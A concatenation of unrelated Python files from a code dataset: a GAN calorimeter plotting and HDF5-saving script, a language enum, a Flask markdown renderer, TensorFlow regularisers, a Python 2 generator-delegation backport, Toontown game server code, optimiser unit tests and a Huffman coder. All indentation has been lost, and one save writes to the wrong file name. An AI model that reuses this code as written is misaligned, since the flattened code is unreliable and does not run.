plot_max(max_pos_gan_200, index200, os.path.join(comdir, 'Position_of_max_200.pdf'), 16, 'GAN 200')
plot_max(max_pos_gan_300, index300, os.path.join(comdir, 'Position_of_max_300.pdf'), 17, 'GAN 300')
plot_max(max_pos_gan_400, index400, os.path.join(comdir, 'Position_of_max_400.pdf'), 51, 'GAN 400')
plot_max(max_pos_gan_500, index500, os.path.join(comdir, 'Position_of_max_500.pdf'), 52, 'GAN 500')
plot_energy_hist(sum_gan10, index10, os.path.join(comdir, 'hist_10.pdf'), 18, 'GAN 10')
plot_energy_hist(sum_gan50, index50, os.path.join(comdir, 'hist_50.pdf'), 19, 'GAN 50')
plot_energy_hist(sum_gan100, index100, os.path.join(comdir, 'hist_100.pdf'), 20, 'GAN 100')
plot_energy_hist(sum_gan150, index150, os.path.join(comdir, 'hist_150.pdf'), 21, 'GAN 150')
plot_energy_hist(sum_gan200, index200, os.path.join(comdir, 'hist_200.pdf'), 22, 'GAN 200')
plot_energy_hist(sum_gan300, index300, os.path.join(comdir, 'hist_300.pdf'), 23, 'GAN 300')
plot_energy_hist(sum_gan400, index400, os.path.join(comdir, 'hist_400.pdf'), 53, 'GAN 400')
plot_energy_hist(sum_gan500, index500, os.path.join(comdir, 'hist_500.pdf'), 54, 'GAN 500')
## Make plots for real data
if (get_actual):
plot_real(isreal2_10, index10, os.path.join(discdir, 'real_10_act.pdf'), 61, 'Data 10')
plot_real(isreal2_50, index50, os.path.join(discdir, 'real_50_act.pdf'), 62, 'Data 50')
plot_real(isreal2_100, index100, os.path.join(discdir, 'real_100_act.pdf'), 63, 'Data 100')
plot_real(isreal2_200, index200, os.path.join(discdir, 'real_200_act.pdf'), 65, 'Data 200')
plot_error(energy_sampled10, aux_out2_10, index10, os.path.join(discdir, 'error_10_act.pdf'), 67, 'Data 10', 0)
plot_error(energy_sampled50, aux_out2_50, index50, os.path.join(discdir, 'error_50_act.pdf'), 68, 'Data 50', 0)
plot_error(energy_sampled100, aux_out2_100, index100, os.path.join(discdir, 'error_100_act.pdf'), 69, 'Data 100')
plot_error(energy_sampled200, aux_out2_200, index200, os.path.join(discdir, 'error_200_act.pdf'), 70, 'Data 200', 0)
plot_max(max_pos_act_10, index10, os.path.join(comdir, 'Position_of_max_10_act.pdf'), 72, 'Data 50')
plot_max(max_pos_act_50, index50, os.path.join(comdir, 'Position_of_max_50_act.pdf'), 73, 'Data 50')
plot_max(max_pos_act_100, index100, os.path.join(comdir, 'Position_of_max_100_act.pdf'), 74, 'Data 100')
plot_max(max_pos_act_200, index200, os.path.join(comdir, 'Position_of_max_200_act.pdf'), 76, 'Data 200')
plot_energy_hist(sum_act10, index10, os.path.join(comdir, 'hist_10_act.pdf'), 78, 'Data 10')
plot_energy_hist(sum_act50, index50, os.path.join(comdir, 'hist_50_act.pdf'), 79, 'Data 50')
plot_energy_hist(sum_act100, index100, os.path.join(comdir, 'hist_100_act.pdf'), 80, 'Data 100')
plot_energy_hist(sum_act200, index200, os.path.join(comdir, 'hist_200_act.pdf'), 82, 'Data 200')
plot_energy(sum_act10, index10, os.path.join(actdir, 'Flat_energy.pdf'), 25, 10)
plot_energy(sum_act50, index50, os.path.join(actdir, 'Flat_energy.pdf'), 25, 50)
plot_energy(sum_act100, index100, os.path.join(actdir, 'Flat_energy.pdf'),25, 100)
plot_energy(sum_act200, index200, os.path.join(actdir, 'Flat_energy.pdf'),25, 200)
plot_energy_hist(sum_act10, index10, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 10')
plot_energy_hist(sum_act50, index50, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 50')
plot_energy_hist(sum_act100, index100, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 100')
plot_energy_hist(sum_act200, index200, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 200')
plot_energy_mean(sum_act10, index10, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 10')
plot_energy_mean(sum_act50, index50, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 50')
plot_energy_mean(sum_act100, index100, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 100')
plot_energy_mean(sum_act200, index200, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 200')
X = np.concatenate((X10, X50, X100, X200))
plot_ecal(X, 4 * num_events, os.path.join(comdir, 'ECAL_sum.pdf'), 28, 'All Data')
plot_energy2(np.multiply(100, aux_out2_10), index10, os.path.join(comdir, 'energy10_act.pdf'), 84, 'Data 10', 'green')
plot_energy2(np.multiply(100, aux_out2_50), index50, os.path.join(comdir, 'energy50_act.pdf'), 85, 'Data 50', 'green')
plot_energy2(np.multiply(100, aux_out2_100), index100, os.path.join(comdir, 'energy100_act.pdf'), 86, 'Data 100', 'green')
plot_energy2(np.multiply(100, aux_out2_200), index200, os.path.join(comdir, 'energy200_act.pdf'), 88, 'Data 200', 'green')
plot_ecal(events_act10, num_events, os.path.join(comdir, 'ECAL_sum10_act.pdf'), 91, 'Data 10')
plot_ecal(events_act50, num_events, os.path.join(comdir, 'ECAL_sum50_act.pdf'), 92, 'Data 50')
plot_ecal(events_act100, num_events, os.path.join(comdir, 'ECAL_sum100_act.pdf'), 93, 'Data 100')
plot_ecal(events_act200, num_events, os.path.join(comdir, 'ECAL_sum200_act.pdf'), 95, 'Data 200')
Y = np.concatenate((energy_sampled10, energy_sampled50, energy_sampled100, energy_sampled150, energy_sampled200, energy_sampled300, energy_sampled400, energy_sampled500))
plot_energy2(np.multiply(100, Y), 6 * num_events, os.path.join(comdir, 'energy.pdf'), 29, 'Primary Energy')
generated_images = np.concatenate((generated_images10, generated_images50, generated_images100, generated_images150, generated_images200, generated_images300, generated_images400, generated_images500))
plot_ecal(generated_images, 6 * num_events, os.path.join(comdir, 'ECAL_sum.pdf'), 28, 'GAN')
## Plots for Generated
plot_max(max_pos_gan_10, index10, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 10')
plot_max(max_pos_gan_50, index50, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 50')
plot_max(max_pos_gan_100, index100, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 100')
plot_max(max_pos_gan_150, index150, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 150')
plot_max(max_pos_gan_200, index200, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 200')
plot_max(max_pos_gan_300, index300, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 300')
plot_max(max_pos_gan_400, index400, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 400')
plot_max(max_pos_gan_500, index500, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 500')
plot_energy(sum_gan10, index10, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 10')
plot_energy(sum_gan50, index50, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 50')
plot_energy(sum_gan100, index100, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 100')
plot_energy(sum_gan150, index150, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 150')
plot_energy(sum_gan200, index200, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 200')
plot_energy(sum_gan300, index300, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 300')
plot_energy(sum_gan400, index400, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 400')
plot_energy(sum_gan500, index500, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 500')
plot_energy_hist(sum_gan10, index10, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 10')
plot_energy_hist(sum_gan50, index50, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 50')
plot_energy_hist(sum_gan100, index100, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 100')
plot_energy_hist(sum_gan150, index150, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 150')
plot_energy_hist(sum_gan200, index200, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 200')
plot_energy_hist(sum_gan300, index300, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 300')
plot_energy_hist(sum_gan400, index400, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 400')
plot_energy_hist(sum_gan500, index500, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 500')
plot_energy_mean(sum_gan10, index10, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 10)
plot_energy_mean(sum_gan50, index50, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 50)
plot_energy_mean(sum_gan100, index100, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 100)
plot_energy_mean(sum_gan150, index150, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 150)
plot_energy_mean(sum_gan200, index200, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 200)
plot_energy_mean(sum_gan300, index300, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 300)
plot_energy_mean(sum_gan400, index400, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 400)
plot_energy_mean(sum_gan500, index500, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 500)
#plot_energy2(np.multiply(100, energy_sampled10), index10, os.path.join(comdir, 'energy10.pdf'), 34, 'Primary 10', 'red', '--')
#plot_energy2(np.multiply(100, energy_sampled50), index50, os.path.join(comdir, 'energy50.pdf'), 35, 'Primary 50', 'blue', '--')
#plot_energy2(np.multiply(100, energy_sampled100), index100, os.path.join(comdir, 'energy100.pdf'), 36, 'Primary 100', 'green', '--')
#plot_energy2(np.multiply(100, energy_sampled150), index150, os.path.join(comdir, 'energy150.pdf'), 37, 'Primary 150', 'yellow', '--')
#plot_energy2(np.multiply(100, energy_sampled200), index200, os.path.join(comdir, 'energy200.pdf'), 38, 'Primary 200', 'cyan', '--')
#plot_energy2(np.multiply(100, energy_sampled300), index300, os.path.join(comdir, 'energy300.pdf'), 39, 'Primary 300', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled400), index400, os.path.join(comdir, 'energy400.pdf'), 39, 'Primary 400', 'magenta', '--') #plot_energy2(np.multiply(100, energy_sampled500), index500, os.path.join(comdir, 'energy500.pdf'), 39, 'Primary 500', 'magenta', '--')
plot_energy2(np.multiply(100, aux_out10), index10, os.path.join(comdir, 'energy10.pdf'), 34, 'GAN 10')
plot_energy2(np.multiply(100, aux_out50), index50, os.path.join(comdir, 'energy50.pdf'), 35, 'GAN 50')
plot_energy2(np.multiply(100, aux_out100), index100, os.path.join(comdir, 'energy100.pdf'), 36, 'GAN 100')
plot_energy2(np.multiply(100, aux_out150), index150, os.path.join(comdir, 'energy150.pdf'), 37, 'GAN 150')
plot_energy2(np.multiply(100, aux_out200), index200, os.path.join(comdir, 'energy200.pdf'), 38, 'GAN 200')
plot_energy2(np.multiply(100, aux_out300), index300, os.path.join(comdir, 'energy300.pdf'), 39, 'GAN 300')
plot_energy2(np.multiply(100, aux_out400), index400, os.path.join(comdir, 'energy400.pdf'), 55, 'GAN 400')
plot_energy2(np.multiply(100, aux_out500), index500, os.path.join(comdir, 'energy500.pdf'), 56, 'GAN 500')
#plot_energy2(np.multiply(100, energy_sampled10), index10, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 10', 'red', '--')
#plot_energy2(np.multiply(100, energy_sampled50), index50, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 50', 'blue', '--')
#plot_energy2(np.multiply(100, energy_sampled100), index100, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 100', 'green', '--')
#plot_energy2(np.multiply(100, energy_sampled150), index150, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 150', 'yellow', '--')
#plot_energy2(np.multiply(100, energy_sampled200), index200, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 200', 'cyan', '--')
#plot_energy2(np.multiply(100, energy_sampled300), index300, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 300', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled400), index400, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 400', 'magenta', '--') #plot_energy2(np.multiply(100, energy_sampled500), index500, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 500', 'magenta', '--')
plot_energy2(np.multiply(100, aux_out10), index10, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 10', 'red', '-')
plot_energy2(np.multiply(100, aux_out50), index50, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 50', 'blue', '-')
plot_energy2(np.multiply(100, aux_out100), index100, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 100', 'green', '-')
plot_energy2(np.multiply(100, aux_out150), index150, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 150', 'yellow', '-')
plot_energy2(np.multiply(100, aux_out200), index200, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 200', 'cyan', '-')
plot_energy2(np.multiply(100, aux_out300), index300, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 300', 'magenta', '-')
plot_energy2(np.multiply(100, aux_out400), index400, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 400', 'red', '-')
plot_energy2(np.multiply(100, aux_out500), index500, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 500', 'blue', '-')
plot_ecal(events_gan10, num_events, os.path.join(comdir, 'ECAL_sum10.pdf'), 41, 'GAN 10')
plot_ecal(events_gan50, num_events, os.path.join(comdir, 'ECAL_sum50.pdf'), 42, 'GAN 50')
plot_ecal(events_gan100, num_events, os.path.join(comdir, 'ECAL_sum100.pdf'), 43, 'GAN 100')
plot_ecal(events_gan150, num_events, os.path.join(comdir, 'ECAL_sum150.pdf'), 44, 'GAN 150')
plot_ecal(events_gan200, num_events, os.path.join(comdir, 'ECAL_sum200.pdf'), 45, 'GAN 200')
plot_ecal(events_gan300, num_events, os.path.join(comdir, 'ECAL_sum300.pdf'), 46, 'GAN 300')
plot_ecal(events_gan400, num_events, os.path.join(comdir, 'ECAL_sum400.pdf'), 57, 'GAN 400')
plot_ecal(events_gan500, num_events, os.path.join(comdir, 'ECAL_sum500.pdf'), 58, 'GAN 500')
### Save generated image data to file
if (save):
generated_images = (generated_images10)
generated_images = np.squeeze(generated_images)
with h5py.File(filename10,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled10)
outfile.create_dataset('AUX',data=aux_out10)
outfile.create_dataset('ISREAL',data=isreal10)
print "Generated ECAL saved to ", filename10
generated_images = (generated_images50)
generated_images = np.squeeze(generated_images)
with h5py.File(filename50,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled50)
outfile.create_dataset('AUX',data=aux_out50)
outfile.create_dataset('ISREAL',data=isreal50)
print "Generated ECAL saved to ", filename50
generated_images = (generated_images100)
generated_images = np.squeeze(generated_images)
with h5py.File(filename100,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled100)
outfile.create_dataset('AUX',data=aux_out100)
outfile.create_dataset('ISREAL',data=isreal100)
print "Generated ECAL saved to ", filename100
generated_images = (generated_images150)
generated_images = np.squeeze(generated_images)
with h5py.File(filename150,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled150)
outfile.create_dataset('AUX',data=aux_out150)
outfile.create_dataset('ISREAL',data=isreal150)
print "Generated ECAL saved to ", filename150
generated_images = (generated_images200)
generated_images = np.squeeze(generated_images)
with h5py.File(filename200,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled200)
outfile.create_dataset('AUX',data=aux_out200)
outfile.create_dataset('ISREAL',data=isreal200)
print "Generated ECAL saved to ", filename200
generated_images = (generated_images300)
generated_images = np.squeeze(generated_images)
with h5py.File(filename300,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled300)
outfile.create_dataset('AUX',data=aux_out300)
outfile.create_dataset('ISREAL',data=isreal300)
print "Generated ECAL saved to ", filename300
generated_images = (generated_images400)
generated_images = np.squeeze(generated_images)
with h5py.File(filename400,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled400)
outfile.create_dataset('AUX',data=aux_out400)
outfile.create_dataset('ISREAL',data=isreal400)
print "Generated ECAL saved to ", filename400
generated_images = (generated_images500)
generated_images = np.squeeze(generated_images)
with h5py.File(filename300,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled500)
outfile.create_dataset('AUX',data=aux_out500)
outfile.create_dataset('ISREAL',data=isreal500)
print "Generated ECAL saved to ", filename500
print 'Plots are saved in', ' fixed_plots/disc_outputs, ', 'fixed_plots/Actual, ', 'fixed_plots/Generated and ', 'fixed_plots/Combined'
|
StarcoderdataPython
|
18523
|
<gh_stars>100-1000
"""
Language enumeration. Part of the StoryTechnologies project.
June 12, 2016
<NAME> (<EMAIL>)
"""
from enum import Enum
class Language(Enum):
# https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes
# https://en.wikipedia.org/wiki/ISO_639-2
ENG = 1 # English
SPA = 2 # Spanish
DEU = 3 # German
ITA = 4 # Italian
FRA = 5 # French
NLD = 6 # Dutch
def __str__(self):
return self.name
|
StarcoderdataPython
|
1622276
|
from flask import render_template_string, current_app
from mistune import create_markdown
md_to_unsafe_html = create_markdown(escape=False, renderer="html", plugins=["strikethrough"])
def render_markdown(filename):
try:
with open(f"{current_app.config['MARKDOWN_PATH']}{filename}", "r") as f:
string = f.read()
except:
if current_app.env == "production":
current_app.logger.critical("Failed to render missing markdown file: %s", filename, exc_info=True)
return ""
raise
string = render_template_string(string)
# Jinja has now escaped any HTML in the md file
return md_to_unsafe_html(string)
|
StarcoderdataPython
|
91249
|
import tensorflow as tf
def ridge(alpha, beta, family):
return tf.reduce_sum(tf.square(beta))
def lasso(alpha, beta, family):
return tf.reduce_sum(tf.abs(beta))
def network_fusion_x(graph):
graph = tf.cast(graph, tf.float32)
def tmp(alpha, beta, family):
return tf.linalg.trace(tf.matmul(tf.transpose(beta), tf.matmul(graph, beta)))
return tmp
def network_fusion_y(graph):
graph = tf.cast(graph, tf.float32)
def tmp(alpha, beta, family):
return tf.linalg.trace(tf.matmul(beta, tf.matmul(graph, tf.transpose(beta))))
return tmp
|
StarcoderdataPython
|
1699219
|
from compat.functools import wraps as _wraps
from sys import exc_info as _exc_info
class _from(object):
def __init__(self, EXPR):
self.iterator = iter(EXPR)
def supergenerator(genfunct):
"""Implements PEP 380. Use as:
@supergenerator
def genfunct(*args):
try:
sent1 = (yield val1)
,,,
retval = yield _from(iterator)
...
except Exception, e:
# caller did generator.throw
pass
finally:
pass # closing
"""
@_wraps(genfunct)
def wrapper(*args, **kwargs):
gen = genfunct(*args, **kwargs)
try:
# if first poll of gen raises StopIteration
# or any other Exception, we propagate
item = gen.next()
# OUTER loop
while True:
# yield _from(EXPR)
# semantics based on PEP 380, Revised**12, 19 April
if isinstance(item, _from):
_i = item.iterator
try:
# first poll of the subiterator
_y = _i.next()
except StopIteration, _e:
# subiterator exhausted on first poll
# extract return value
_r = _e.args if _e.args else (None,)
else:
# INNER loop
while True:
try:
# yield what the subiterator did
_s = (yield _y)
except GeneratorExit, _e:
# close the subiterator if possible
try:
_close = _i.close
except AttributeError:
pass
else:
_close()
# finally clause will gen.close()
raise _e
except BaseException:
# caller did wrapper.throw
_x = _exc_info()
# throw to the subiterator if possible
try:
_throw = _i.throw
except AttributeError:
# doesn't attempt to close _i?
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.throw(*_x)
_r = None
# fall through to INTERSECTION A
# then to OUTER loop
pass
else:
try:
_y = _throw(*_x)
except StopIteration, _e:
_r = _e.args if _e.args else (None,)
# fall through to INTERSECTION A
# then to INTERSECTION B
pass
else:
# restart INNER loop
continue
# INTERSECTION A
# restart OUTER loop or proceed to B?
if _r is None: break
else:
try:
# re-poll the subiterator
if _s is None:
_y = _i.next()
else:
_y = _i.send(_s)
except StopIteration, _e:
# subiterator is exhausted
# extract return value
_r = _e.args if _e.args else (None,)
# fall through to INTERSECTION B
pass
else:
# restart INNER loop
continue
# INTERSECTION B
# done yielding from subiterator
# send retvalue to gen
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.send(_r[0])
# restart OUTER loop
break
# traditional yield from gen
else:
try:
sent = (yield item)
except Exception:
# caller did wrapper.throw
_x = _exc_info()
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.throw(*_x)
else:
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.send(sent)
# end of OUTER loop, restart it
pass
finally:
# gen raised Exception
# or caller did wrapper.close()
# or wrapper was garbage collected
gen.close()
return wrapper
|
StarcoderdataPython
|
4834107
|
from panda3d.core import *
from direct.distributed import DistributedSmoothNodeAI
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
class DistributedCashbotBossObjectAI(DistributedSmoothNodeAI.DistributedSmoothNodeAI, FSM.FSM):
wantsWatchDrift = 1
def __init__(self, air, boss):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.__init__(self, air)
FSM.FSM.__init__(self, 'DistributedCashbotBossObjectAI')
self.boss = boss
self.reparentTo(self.boss.scene)
self.avId = 0
self.craneId = 0
def cleanup(self):
self.detachNode()
self.stopWaitFree()
def delete(self):
self.cleanup()
DistributedSmoothNodeAI.DistributedSmoothNodeAI.delete(self)
def startWaitFree(self, delayTime):
waitFreeEvent = self.uniqueName('waitFree')
taskMgr.remove(waitFreeEvent)
taskMgr.doMethodLater(delayTime, self.doFree, waitFreeEvent)
def stopWaitFree(self):
waitFreeEvent = self.uniqueName('waitFree')
taskMgr.remove(waitFreeEvent)
def doFree(self, task):
if not self.isDeleted():
self.demand('Free')
p = self.getPos()
h = self.getH()
self.d_setPosHpr(p[0], p[1], 0, h, 0, 0)
return Task.done
def getBossCogId(self):
return self.boss.doId
def d_setObjectState(self, state, avId, craneId):
self.sendUpdate('setObjectState', [state, avId, craneId])
def requestGrab(self):
avId = self.air.getAvatarIdFromSender()
if self.state != 'Grabbed' and self.state != 'Off':
craneId, objectId = self.__getCraneAndObject(avId)
if craneId != 0 and objectId == 0:
self.demand('Grabbed', avId, craneId)
return
self.sendUpdateToAvatarId(avId, 'rejectGrab', [])
def requestDrop(self):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId and self.state == 'Grabbed':
craneId, objectId = self.__getCraneAndObject(avId)
if craneId != 0 and objectId == self.doId:
self.demand('Dropped', avId, craneId)
def hitFloor(self):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId and self.state == 'Dropped':
self.demand('SlidingFloor', avId)
def requestFree(self, x, y, z, h):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId:
self.setPosHpr(x, y, 0, h, 0, 0)
self.demand('WaitFree')
def hitBoss(self, impact):
pass
def removeToon(self, avId):
if avId == self.avId:
self.doFree(None)
return
def __getCraneAndObject(self, avId):
if self.boss and self.boss.cranes != None:
for crane in self.boss.cranes:
if crane.avId == avId:
return (crane.doId, crane.objectId)
return (0, 0)
def __setCraneObject(self, craneId, objectId):
if self.air:
crane = self.air.doId2do.get(craneId)
if crane:
crane.objectId = objectId
def enterGrabbed(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.__setCraneObject(self.craneId, self.doId)
self.d_setObjectState('G', avId, craneId)
def exitGrabbed(self):
self.__setCraneObject(self.craneId, 0)
def enterDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.d_setObjectState('D', avId, craneId)
self.startWaitFree(10)
def exitDropped(self):
self.stopWaitFree()
def enterSlidingFloor(self, avId):
self.avId = avId
self.d_setObjectState('s', avId, 0)
if self.wantsWatchDrift:
self.startWaitFree(5)
def exitSlidingFloor(self):
self.stopWaitFree()
def enterWaitFree(self):
self.avId = 0
self.craneId = 0
self.startWaitFree(1)
def exitWaitFree(self):
self.stopWaitFree()
def enterFree(self):
self.avId = 0
self.craneId = 0
self.d_setObjectState('F', 0, 0)
def exitFree(self):
pass
|
StarcoderdataPython
|
1643041
|
<reponame>pymir3/pymir3
import mir3.data.base_object as bo
import mir3.data.metadata as md
class DataObject(bo.BaseObject):
"""Standard base for interface objects.
Provides some methods to make it easier to develop interface objects.
Attributes:
metadata: object of type Metadata with information about the data
stored.
data: any kind of data the derived class wants to use.
"""
def __init__(self, metadata=None):
"""Initializes metadata to given value and data to None.
The metadata isn't copied, so any modifications affect both objects.
Args:
metadata: Metadata object to associate with this interface. Default:
None.
"""
super(DataObject, self).__init__()
# Defines a valid metadata
if metadata is not None:
self.metadata = metadata
else:
self.metadata = md.Metadata();
# Default data
self.data = None
|
StarcoderdataPython
|
1704259
|
<reponame>matheusccouto/palpiteiro<filename>tests/test_palpiteiro_draft.py
""" Unit-tests for palpiteiro.draft """
import os
import time
import pandas as pd
import pytest
import palpiteiro
import palpiteiro.data
import palpiteiro.draft
THIS_FOLDER = os.path.dirname(__file__)
# Get clubs.
clubs = palpiteiro.data.get_clubs_with_odds(
"1902",
cache_folder=os.path.join(THIS_FOLDER, "data"),
cache_file="betting_lines.json",
)
# Initialize Cartola FC API.
cartola_fc_api = palpiteiro.data.CartolaFCAPI()
# Players.
players = palpiteiro.create_all_players(cartola_fc_api.players(), clubs)
players = [player for player in players if player.status in [2, 7]]
players = [player for player in players if pd.notna(player.club.win_odds)]
# Schemes.
schemes = palpiteiro.create_schemes(cartola_fc_api.schemes())
class TestRandomLineUp:
""" Test random_line_up function."""
def test_is_valid(self):
""" Test if generated line up is valid. """
line_up = palpiteiro.draft.random_line_up(players, schemes, 1e6)
assert line_up.is_valid(schemes)
def test_is_expensive(self):
"""
Test if it raises an error when it is impossible to create a team with the
available money.
"""
with pytest.raises(RecursionError):
palpiteiro.draft.random_line_up(players, schemes, 0)
def test_affordable(self):
""" Make sure all line ups generated are below max price."""
prices = [
palpiteiro.draft.random_line_up(players, schemes, 70).price
for _ in range(100)
]
assert max(prices) <= 70
def test_perfomance(self):
""" Test if it runs functions 100 times in less than a second. """
start = time.time()
for _ in range(100):
palpiteiro.draft.random_line_up(players, schemes, 1e6)
end = time.time()
assert end - start < 1 # seconds
class TestMutateLineUp:
""" Unit tests for mutate_line_up function. """
@classmethod
def setup_class(cls):
""" Setup class. """
cls.line_up = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
def test_not_equal(self):
""" Check that the mutated line up is not equal. """
new_line_up = palpiteiro.draft.mutate_line_up(
line_up=self.line_up, players=players, schemes=schemes, max_price=1e6,
)
assert new_line_up != self.line_up
def test_perfomance(self):
""" Test if it runs functions 100 times in less than a second. """
start = time.time()
for _ in range(1000):
palpiteiro.draft.mutate_line_up(self.line_up, players, schemes, 1e6)
end = time.time()
assert end - start < 1 # seconds
class TestCrossoverLineUp:
""" Unit tests for crossover_line_up function. """
@classmethod
def setup_class(cls):
""" Setup class. """
cls.line_up1 = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
cls.line_up2 = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
def test_perfomance(self):
""" Test if it runs functions 100 times in less than a second. """
start = time.time()
for _ in range(100):
palpiteiro.draft.crossover_line_up(
line_up1=self.line_up1, line_up2=self.line_up2, max_price=1e6
)
end = time.time()
assert end - start < 1 # seconds
class TestDraft:
""" Unit tests for draft class. """
def test_duplicates(self):
""" Make sure there aren't duplicates on the final team. """
best_line_up = palpiteiro.draft.draft(
individuals=200,
generations=100,
players=players,
schemes=schemes,
max_price=1e6,
tournament_size=5,
)
players_ids = [player.id for player in best_line_up]
assert len(players_ids) == len(set(players_ids))
def test_draft(self):
""" Test main functionality. """
best_line_up = palpiteiro.draft.draft(
individuals=200,
generations=100,
players=players,
schemes=schemes,
max_price=100,
tournament_size=5,
)
assert best_line_up.points > 0
def test_convergence(self):
""" Test if it converges to a single solution. """
line_ups = [palpiteiro.draft.draft(
individuals=100,
generations=1000,
players=players,
schemes=schemes,
max_price=100,
tournament_size=5,
) for _ in range(2)]
assert line_ups[0] == line_ups[-1]
|
StarcoderdataPython
|
1704757
|
#!/usr/bin/env python3
import sys
import collections
from operator import itemgetter
from queue import PriorityQueue
__author__ = "<NAME>"
__license__ = "MIT"
class Node:
def __init__(self, left=None, right=None, value=None):
self.left = left
self.right = right
self.value = value
@classmethod
def as_leaf(cls, value):
return cls(None, None, value)
def leafs(self):
return self.left, self.right
def __lt__(self, other):
if not self.value:
return self.left < other
elif not other.value:
return self < other.left
else:
return self.value < other.value
def create_huffman_coding(freqs):
q = PriorityQueue()
for value in freqs:
q.put((value[1], Node.as_leaf(value[0])))
while q.qsize() > 1:
l, r = q.get(), q.get()
node = Node(l[1], r[1])
q.put((l[0] + r[0], node))
return q.get()
def walk_tree(node, prefix="", code={}):
if node.left.value is None:
walk_tree(node.left, prefix + "0", code)
else:
code[node.left.value] = prefix + "0"
if node.right.value is None:
walk_tree(node.right, prefix + "1", code)
else:
code[node.right.value] = prefix + "1"
return code
def main():
"""
"""
chars = list(sys.stdin.read().strip())
freq = collections.Counter(chars)
root = create_huffman_coding(freq.most_common())
code = walk_tree(root[1])
s = sorted(code.items(), key=itemgetter(0), reverse=False)
for char, encoding, in s:
print("{} {}".format(char, encoding))
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3309183
|
# -*- coding: utf-8 -*-
# Author: hpf
# Date: 2020/3/1 上午10:31
# File: utils.py
# IDE: PyCharm
import datetime
import ipaddress, glob, json, os, jwt
